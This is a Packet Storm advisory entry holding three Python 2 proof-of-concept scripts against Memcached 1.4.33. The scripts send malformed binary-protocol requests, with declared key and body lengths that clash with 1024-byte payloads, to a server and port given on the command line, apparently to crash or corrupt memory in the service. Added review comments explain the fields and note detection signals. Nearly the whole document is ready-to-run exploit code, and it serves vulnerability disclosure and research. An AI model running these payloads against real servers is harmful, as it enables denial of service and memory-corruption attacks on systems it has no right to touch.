Memcached 1.4.33 Proof Of Concept

2016-11-03T00:00:00
ID PACKETSTORM:139572
Type packetstorm
Reporter dawu
Modified 2016-11-03T00:00:00

Description

                                        
                                            `# Source: http://paper.seebug.org/95/  
  
import struct   
import socket   
import sys  
  
# Fields of a memcached binary-protocol request header, assembled below
# in wire order (24 bytes: magic, opcode, key length, extras length,
# data type, vbucket, total body length, opaque, CAS).
MEMCACHED_REQUEST_MAGIC = "\x80"   # magic byte 0x80 marks a request
OPCODE_PREPEND_Q = "\x1a"          # opcode 0x1a (quiet prepend)
key_len = struct.pack("!H",0xfa)   # declared key length: 250 (big-endian uint16)
extra_len = "\x00"                 # declared extras length: 0
data_type = "\x00"
vbucket = "\x00\x00"
body_len = struct.pack("!I",0)     # declared total body length: 0 (big-endian uint32)
opaque = struct.pack("!I",0)
CAS = struct.pack("!Q",0)
body = "A"*1024                    # 1024 bytes actually sent after the header
# NOTE(review): the declared lengths (key 250, body 0) disagree with the
# 1024-byte payload that follows the header; a protocol-aware monitor can
# flag header/payload length mismatches of this kind on the memcached port.

if len(sys.argv) != 3:
print "./poc_crash.py <server> <port>"
# NOTE(review): the print above belongs under the `if`; its indentation
# appears to have been lost in this listing.

# Header and payload concatenated into one binary request.
packet = MEMCACHED_REQUEST_MAGIC + OPCODE_PREPEND_Q + key_len + extra_len
packet += data_type + vbucket + body_len + opaque + CAS
packet += body

# Text-protocol commands: store a 4-byte value under "testkey" with a
# 60-second expiry, and read it back.
set_packet = "set testkey 0 60 4\r\ntest\r\n"
get_packet = "get testkey\r\n"

# Connection 1: text-protocol set; the server reply is printed.
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.connect((sys.argv[1],int(sys.argv[2])))
s1.sendall(set_packet)
print s1.recv(1024)
s1.close()


# Connection 2: the binary request built above; the reply (if any) is printed.
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((sys.argv[1],int(sys.argv[2])))
s2.sendall(packet)
print s2.recv(1024)
s2.close()

# Connection 3: text-protocol get; the reply is read but not printed.
s3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s3.connect((sys.argv[1],int(sys.argv[2])))
s3.sendall(get_packet)
s3.recv(1024)
s3.close()
  
  
=========  
  
import struct   
import socket   
import sys  
  
  
# Binary-protocol request header fields, assembled below in wire order.
MEMCACHED_REQUEST_MAGIC = "\x80"   # magic byte 0x80 marks a request
OPCODE_ADD = "\x02"                # opcode 0x02 (add)
key_len = struct.pack("!H",0xfa)   # declared key length: 250
extra_len = "\x08"                 # declared extras length: 8
data_type = "\x00"
vbucket = "\x00\x00"
body_len = struct.pack("!I",0xffffffd0)   # declared total body length: 4294967248
opaque = struct.pack("!I",0)
CAS = struct.pack("!Q",0)
extras_flags = 0xdeadbeef                 # defined but never placed in the packet
extras_expiry = struct.pack("!I",0xe10)   # defined but never placed in the packet
body = "A"*1024                           # 1024 bytes actually sent after the header

# Header and payload concatenated into one binary request.
# NOTE(review): the declared body length (~4 GiB) and extras length (8)
# disagree with the 1024-byte payload that follows; header/payload length
# mismatches like this are a usable detection signal on the memcached port.
packet = MEMCACHED_REQUEST_MAGIC + OPCODE_ADD + key_len + extra_len
packet += data_type + vbucket + body_len + opaque + CAS
packet += body
if len(sys.argv) != 3:
print "./poc_add.py <server> <port>"
# NOTE(review): the print above belongs under the `if`; its indentation
# appears to have been lost in this listing.
# Single connection: send the request and print whatever the server replies.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],int(sys.argv[2])))
s.sendall(packet)
print s.recv(1024)
s.close()
  
=========  
  
import struct   
import socket   
import sys  
  
  
MEMCACHED_REQUEST_MAGIC = "\x80"   # magic byte 0x80 marks a request
# NOTE(review): named OPCODE_SET here, but 0x21 is the SASL Auth opcode in
# the memcached binary protocol (0x01 is set); the usage string below also
# refers to this as poc_sasl.py.
OPCODE_SET = "\x21"
key_len = struct.pack("!H",32)     # declared key length: 32
body_len = struct.pack("!I",1)     # declared total body length: 1
# Only 12 bytes precede the payload here (magic, opcode, key_len, body_len
# twice), not the full 24-byte header built in the other two scripts; the
# 1000-byte payload again exceeds the declared lengths.
packet = MEMCACHED_REQUEST_MAGIC + OPCODE_SET + key_len + body_len*2 + "A"*1000
if len(sys.argv) != 3:
print "./poc_sasl.py <server> <ip>"
# NOTE(review): the print above belongs under the `if` (indentation appears
# lost in this listing), and its second placeholder reads "<ip>" although
# argv[2] is used as the port below.
# Single connection: send the request and print whatever the server replies.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],int(sys.argv[2])))
s.sendall(packet)
print s.recv(1024)
s.close()
  